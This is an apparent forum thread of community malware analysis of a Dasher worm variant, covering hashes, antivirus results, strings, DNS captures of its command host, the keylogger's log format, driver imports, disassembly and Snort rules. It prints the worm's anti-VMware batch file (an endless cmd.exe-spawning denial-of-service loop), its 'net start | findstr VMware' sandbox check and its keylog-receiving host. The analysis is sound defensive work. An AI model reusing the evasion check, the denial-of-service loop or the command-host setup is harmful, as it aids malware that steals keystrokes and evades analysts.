Skip navigation.
Home

New A/V Unknown Dasher variant

UPDATE: F-Secure now detects this worm C:\virus\dasher\new\lol.exe Infection: Net-Worm.Win32.Dasher.c Good job F-Secure guys!

NOTE: This worm specifically detects and attacks vmware systems to avoid analysis. More in the comments.

So thanks to tebodell we have a probable new varient of dasher. Many of the antivirus tools don't find anything and this was a real pain to analyze. Basically it crashed my packer detectors, ida found nothing, pe explorer couldnt open it at all and neither could objdump. It crashed my vmware by opening 10000000 cmd.exe windows. I submitted it to a couple of the a/v vendors in case they don't already have it.

Once I was able to dump it from memory I was able to find:
0000356B 0040356B 0 SqlExp3.exe
00003577 00403577 0 SqlExp2.exe
00003583 00403583 0 SqlExp1.exe
0000358F 0040358F 0 SqlExp.exe
0000359A 0040359A 0 SqlScan.exe
000035A6 004035A6 0 Sqltob.exe

in the strings which adds credence to the theory that this is a dasher varient. The fact that it basically DOS's a vmware is interesting.

Scanning -> C:\malware\dasher2\lol.exe
File Type : Exe, Size : 70860 (0114CCh) Bytes
[!] File appears to have no protection or is using an unknown protection
- Scan Took : 0.953 Seconds

Packers detected:
PE_PATCH, UPACK

207.68.183.32

Different stages of debugging:

This is the original binary.

md5sum: ee8dbce857adf03838d882086c31b367 *lol.exe
sha1sum: b6adc65b1e0a45909d062e1e09357f9eb4be2cc8
sha256sum: 8fb8c1f037a2f52519d417e7aa596d6e81fa8c58928bebcb97adf7742e60d389
info: 70860 Dec 24 10:27 lol.exe
lol.exe: MS-DOS executable (EXE)

This is the binary in ollydbg at the start and various stages
75c372951393f398495c3e62053e55b9 *dumped.exe
75c372951393f398495c3e62053e55b9 *dumped2.exe
75c372951393f398495c3e62053e55b9 *dumped3.exe

This is the binary in ollydbg right before it executes N cmd.exe windows.
md5sum: 5cfeee4714b69aed84380343bffc7abe *dumped4.exe
sha1sum: bf8069c233765ca6e823887c5cec6f36954520d9
sha256sum: 20aebba227e048708dedb527bdbeb002b506fc7f4873da0bb5075167cae8fd6f
info: dumped4.exe: MS-DOS executable (EXE)
192512 Dec 24 10:20 dumped4.exe

objdump cannot recognize the file.

My symantec antivirus finds nothing.
various antivirus scans find almost nothing:

The original lol.exe file:
=========================================
AntiVir Found nothing
ArcaVir Found Win32
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found Exploit.SQL.Hello.B
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found Net-Worm.Win32.Dasher.c
NOD32 Found probably a variant of Win32/Dasher (probable variant)
Norman Virus Control Found nothing
UNA Found nothing
VBA32 Found nothing

The dumped4.exe file:
==========================================
AntiVir Found Worm/Dasher.B.TScan
ArcaVir Found nothing
Avast Found Win32:Dasher-B
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found Worm.Dasher.B-3
Dr.Web Found BackDoor.Winshe
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found probably a variant of Win32/Dasher (probable variant)
Norman Virus Control Found nothing
UNA Found nothing
VBA32 Found nothing

interesting strings

There are alot of strings that match the previous dasher variant, and some new interersting ones.

Maybe it shuts down firewalls?

000034BC 004034BC 0 Blackice.exe
000034C9 004034C9 0 Blackd.exe
000034D4 004034D4 0 EGhost.exe
000034DF 004034DF 0 adam.exe
000034E8 004034E8 0 system.exe
000034F3 004034F3 0 Iparmor.exe
000034FF 004034FF 0 Zonealarm.exe

Maybe they should be better about strings :)
00004E2C 00404E2C 0 Sqltob Final!!! by rainer

I guess this is how it knows its in a VMware. This could make analysis suck :(

000177B2 004177B2 0 net start | findstr Virtual && echo VirtualPC>%s
000177E5 004177E5 0 net start | findstr VMware && echo VMware>%s
00017816 00417816 0 %s\Virtual.bat
00017825 00417825 0 %s\VirtualPC.txt
00017836 00417836 0 %s\VMware.txt

confirmed

Ive confirmed those files as well. The plot thickens however. These files have also been obfuscated to make analysis harder. They crash my packer id tools as well. even protection id which doesnt ususally crash.

I dumped the eiafasrk.dl1 and eiafasrk.dll from memor and in the .dll I find the following URL:

rain357.3322.org

Which is in china but appears to be down.
Here are the checksums for the dumped dlls. I suspect these might change on differnt systems:

C:\malware\dasher2\dumped_eia_fasrk_dl1.dll
md5sum: afb852d0992c4c0a484d329d74ccdd97
sha1sum: 7c884bd6eb6b7c05eb5193342b4b1b7350225db2
sha256sum: 68135e51023853c69852ac699874b8f37df8d4f839a443319dcdea85c1032680

C:\malware\dasher2\dumped_eia_fasrk_dll.dll
md5sum: 56d22f66bf61f163061ec2a143057d68
sha1sum: db0663720c77831e0935c7773d09acdbd200bb3a
sha256sum: a855caf30a9668581f9814f144bd30b9a1846d8ead861a4851d1dab7a16244e7

More as I get it.

V.

network specifics

First it sends two DNS packets to query for the URL rain357.3322.org

0000 00 06 25 62 de 56 00 0c 29 7e 41 d5 08 00 45 00 ..%b.V..)~A...E.
0010 00 3e 12 dd 00 00 80 11 b8 b5 c0 a8 01 66 ac 10 .>...........f..
0020 00 fe 04 03 00 35 00 2a 3a fe 04 23 01 00 00 01 .....5.*:..#....
0030 00 00 00 00 00 00 07 72 61 69 6e 33 35 37 04 33 .......rain357.3
0040 33 32 32 03 6f 72 67 00 00 01 00 01 322.org.....

Then we get a response. The site is down:

0000 00 0c 29 7e 41 d5 00 06 25 62 de 56 08 00 45 00 ..)~A... %b.V..E.
0010 00 9a 04 e8 00 00 40 11 06 4f ac 10 00 fe c0 a8 ......@. .O......
0020 01 66 00 35 04 26 00 86 50 0f 04 24 81 80 00 01 .f.5.&.. P..$....
0030 00 01 00 02 00 02 07 72 61 69 6e 33 35 37 04 33 .......r ain357.3
0040 33 32 32 03 6f 72 67 00 00 01 00 01 c0 0c 00 01 322.org. ........
0050 00 01 00 00 00 05 00 04 c0 a8 00 ff c0 14 00 02 ........ ........
0060 00 01 00 00 0e e7 00 0e 03 6e 73 32 04 33 33 32 ........ .ns2.332
0070 32 03 6e 65 74 00 c0 14 00 02 00 01 00 00 0e e7 2.net... ........
0080 00 06 03 6e 73 31 c0 42 c0 58 00 01 00 01 00 01 ...ns1.B .X......
0090 2e ef 00 04 3d b1 5f 7d c0 3e 00 01 00 01 00 01 ....=._} .>......
00a0 2e ef 00 04 de b9 f5 fe ........

I believe that if The site was up and the dns query was successful, keylog data would be send.

Here is the apnic info for this addrerss:

inetnum: 61.177.0.0 - 61.177.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-JS
mnt-routes: maint-chinanet-js
changed: hostmaster@ns.chinanet.cn.net 20020209
changed: hostmaster@ns.chinanet.cn.net 20030306
status: ALLOCATED non-PORTABLE
source: APNIC

route: 61.177.0.0/16
descr: CHINANET jiangsu province network
country: CN
origin: AS23650
mnt-by: MAINT-CHINANET-JS
changed: ip@jsinfo.net 20030414
source: APNIC

role: CHINANET JIANGSU
address: No.268,Hanzhong Road,Nanjing 210029
country: CN
phone: +86-25-6588783
fax-no: +86-25-6588740
e-mail: ip@jsinfo.net
trouble: send anti-spam reports to spam@jsinfo.net
trouble: send abuse reports to abuse@jsinfo.net
trouble: times in GMT+8
admin-c: CH360-AP
tech-c: CS306-AP
tech-c: CN142-AP
nic-hdl: CJ186-AP
remarks: www.jsinfo.net
notify: ip@jsinfo.net
mnt-by: MAINT-CHINANET-JS
changed: dns@ptt.js.cn 20020530
changed: ip@jsinfo.net 20021213
source: APNIC

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: anti-spam@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed: lqing@chinatelecom.com.cn 20051212
mnt-by: MAINT-CHINANET
source: APNIC

V.

spoofing DNS

So spoofing DNS yeilded some strange results.

IEXPLORE.EXE makes sequential TCP SYN connections to the host it thinks is rain357.3322.org from source port 5262.

Mine start at 1433 (sql?) and just kept going port by port. Maybe its looking for a HTTP server on a non-standard port for the backdoor stuff to work?

No keylogger data that I could see was sent but it probably wouldn't try until it establishes a good connection.

I did a lookup on

I did a lookup on rain357.3322.org , and oddly enough the auth. nameserver told me that it's 192.168.0.255 :)

Retrieving DNS records for rain357.3322.org...

DNS servers
ns1.3322.net
ns2.3322.net [222.185.245.254]

Answer records
rain357.3322.org 1 A 192.168.0.255 60s

Authority records
3322.org 1 NS ns1.3322.net 86400s
3322.org 1 NS ns2.3322.net 86400s

Additional records
ns1.3322.net 1 A 61.177.95.125 151314s
ns2.3322.net 1 A 222.185.245.254 150651s

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

and now

LOL, I get 127.0.0.1 (localhost!) from my ISP's nameservers.

Ned

It is not only a keylogger,

It is not only a keylogger, it is also a trojan.
3322.org is a dynamic secondary domain name provider, so rain357.3322.org is actually the attacker's box. and the dns record can be changed at will by the attacker.

The batch file

The worm creates a batch file to run if vmware is detected. The location is c:\documents and settings\username\Local Settings\Temp and the file name is fuckoff.bat. Here is the source:

@echo off
:try
copy "C:\WINDOWS\System32\cmd.exe" "C:\malware\lol.exe" /y
START "C:\WINDOWS\System32\cmd.exe"
goto try

vmware attack code

So this worm detects if it is running in a vmware and attacks the system with a denile of service if so. The attack is basically to open cmd.exe windows until the system dies. The method it uses to detect vmware is somewhat lame. Basically it parses "net start" command output looking for vmware related services. I am going to try to patch the binary to jump over this check so I can run it in the vmware anyway.

Here is some related disassembly:

PS______:00401CD0 ; Attributes: bp-based frame
PS______:00401CD0
PS______:00401CD0 sub_401CD0 proc near ; CODE XREF: sub_40123C+3p
PS______:00401CD0
PS______:00401CD0 var_400 = dword ptr -400h
PS______:00401CD0 var_300 = dword ptr -300h
PS______:00401CD0 var_200 = dword ptr -200h
PS______:00401CD0 var_100 = dword ptr -100h
PS______:00401CD0
PS______:00401CD0 push ebp
PS______:00401CD1 mov ebp, esp
PS______:00401CD3 sub esp, 400h
PS______:00401CD9 push edi
PS______:00401CDA lea eax, [ebp+var_100]
PS______:00401CE0 push eax
PS______:00401CE1 push 100h
PS______:00401CE6 call sub_401FBC
PS______:00401CEB lea eax, [ebp+var_100]
PS______:00401CF1 push eax
PS______:00401CF2 push offset aSVmware_txt ; "%s\\VMware.txt"
PS______:00401CF7 lea eax, [ebp+var_200]
PS______:00401CFD push eax
PS______:00401CFE call sub_402178
PS______:00401D03 lea eax, [ebp+var_100]
PS______:00401D09 push eax
PS______:00401D0A push offset aSVirtualpc_txt ; "%s\\VirtualPC.txt"
PS______:00401D0F lea eax, [ebp+var_300]
PS______:00401D15 push eax
PS______:00401D16 call sub_402178
PS______:00401D1B lea eax, [ebp+var_100]
PS______:00401D21 push eax
PS______:00401D22 push offset aSVirtual_bat ; "%s\\Virtual.bat"
PS______:00401D27 lea eax, [ebp+var_400]
PS______:00401D2D push eax
PS______:00401D2E call sub_402178
PS______:00401D33 push offset aW ; "w"
PS______:00401D38 lea eax, [ebp+var_400]
PS______:00401D3E push eax
PS______:00401D3F call sub_40213C
PS______:00401D44 mov edi, eax
PS______:00401D46 lea eax, [ebp+var_200]
PS______:00401D4C push eax
PS______:00401D4D push offset aNetStartFindst ; "net start | findstr VMware && echo VMwa"...
PS______:00401D52 push edi
PS______:00401D53 call sub_402148
PS______:00401D58 lea eax, [ebp+var_300]
PS______:00401D5E push eax
PS______:00401D5F push offset aNetStartFind_0 ; "net start | findstr Virtual && echo Vir"...
PS______:00401D64 push edi
PS______:00401D65 call sub_402148
PS______:00401D6A push offset aDel0 ; "del %%0\r\n"
PS______:00401D6F push edi
PS______:00401D70 call sub_402148
PS______:00401D75 push edi
PS______:00401D76 call sub_402130
PS______:00401D7B push 0
PS______:00401D7D lea eax, [ebp+var_200]
PS______:00401D83 push eax
PS______:00401D84 call sub_401A9A
PS______:00401D89 add esp, 58h
PS______:00401D8C or eax, eax
PS______:00401D8E jz short loc_401D9D
PS______:00401D90 lea eax, [ebp+var_200]
PS______:00401D96 push eax
PS______:00401D97 call sub_40210C
PS______:00401D9C pop ecx

It crashed my vmware by

It crashed my vmware by opening 10000000 cmd.exe windows.

Why not remove / rename cmd.exe from your vmware image? It should not need it to operate, and if it's hard coded to spawn using cmd.exe.....

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior

keylogger

So every character that is typed gets sent to c:\Program Files\eiafasrk.log and after X characters IEXPLORE.EXE queries eiafasrk.dl1 and then C:\WINDOWS\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat.

I will have some information about the file format of eiafasrk.log soon. Unfortunatly since the attackers site is down I don't have data showing the keylog files getting sent but I will probably try spoofing the dns and see if i can trick it to send.

================================

Ok using the helix knoppix distro I was able to copy off the keylogger file. Booting a vmware to an iso of a knoppix cd is awesome btw. The format of the file is :

[Date Time] Program Name - [filename] path
double echoed keystrokes

EX.

[2005-12-24 21:38:25] TextPad - [Document1 *] C:\Program Files\TextPad 4\TextPad.exe

tthhiiss iiss oonnllyy aa tteesstt

V.

eiafrasrk.sys

This is a PE file and here are the identified functions and some strings:
6a18470b7982b4d3c91b0e2386de64bc *eiafasrk.sys

KfReleaseSpinLock 00010300
KfAcquireSpinLock 00010304
RtlFreeAnsiString 0001030C
RtlUnicodeStringToAnsiString 00010310
ObQueryNameString 00010314
ExAllocatePoolWithTag 00010318
RtlFreeUnicodeString 0001031C
wcscpy 00010320
RtlAnsiStringToUnicodeString 00010324
RtlInitAnsiString 00010328
ZwClose 0001032C
ZwSetValueKey 00010330
RtlInitUnicodeString 00010334
ZwOpenKey 00010338
wcslen 0001033C
wcscat 00010340
strchr 00010344
wcsncmp 00010348
ZwEnumerateKey 0001034C
ExFreePoolWithTag 00010350
wcscmp 00010354
RtlCompareMemory 00010358
RtlUpperString 0001035C
__imp_PsGetCurrentProcessId 00010360
ZwQueryDirectoryFile 00010364
ZwQueryValueKey 00010368
ZwEnumerateValueKey 0001036C
ZwDeviceIoControlFile 00010370
ZwQuerySystemInformation 00010374
IoDeleteDevice 00010378
IoDeleteSymbolicLink 0001037C
IofCompleteRequest 00010380
KeServiceDescriptorTable 00010384
IoCreateSymbolicLink 00010388
IoCreateDevice 0001038C
_wcsupr 00010390
ObfDereferenceObject 00010394
_strupr 00010398
ObReferenceObjectByHandle 0001039C
aRegistryMachin 00010608
aRegistryMach_0 00010678
aRegistryMach_1 000106E0
aRegistryMach_8 00010936
aRegistryMach_9 000109A6
aRegistryMac_10 00010A0E
aRegistryMach_2 00010FE4
aRegistryMach_3 00011018
aRegistryMach_4 00011050
aRegistryMach_5 00011080
aRegistryMach_6 000110B4
aRegistryMach_7 000110E4
aDosdevices 00011970
aDevice 00011C0A
aDosdevices_0 00011C1E
aLegacy_ 00011C3A
PsGetCurrentProcessId 00011DC8
start 00011DCE P
Source2 00012C10

STRINGS

seg001:00010FE4 00000034 C \\REGISTRY\\MACHINE\\SYSTEM\\CURRENTCONTROLSET\\SERVICES
seg001:00011018 00000035 C \\REGISTRY\\MACHINE\\SYSTEM\\CURRENTCONTROLSET\\ENUM\\ROOT
seg001:00011050 00000030 C \\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\SERVICES
seg001:00011080 00000031 C \\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\ENUM\\ROOT
seg001:000110B4 00000030 C \\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET002\\SERVICES
seg001:000110E4 00000031 C \\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET002\\ENUM\\ROOT

C'est la oInk

*** NOTE ***
Use these at your own risk.
If you update/change them please increment the rev number.
These are being written by a person who is just starting out, so advice,suggestions and critique are welcome. Flames will be sent to /dev/null.
-----------------------

alert tcp $HOME_NET any -> $EXTERNAL_NET 6667 (content:"rain357"; nocase; msg:"[OffensiveComputing]Dasher variant phoning home to IRC server";sid:66600001;rev:1)

alert tcp $HOME_NET 5262 -> $EXTERNAL_NET any (flags:S;msg:"[OffensiveComputing]Dasher Variant SYN scanning home";sid:66600002;rev:1)

Question : Should we make VARs for known services with multiple ports , such as $IRC_PORTS & $SSL_PORTS ..etc..etc...

" Fuck the fucking fuckers before they fuck you "
- The Rogue Warrior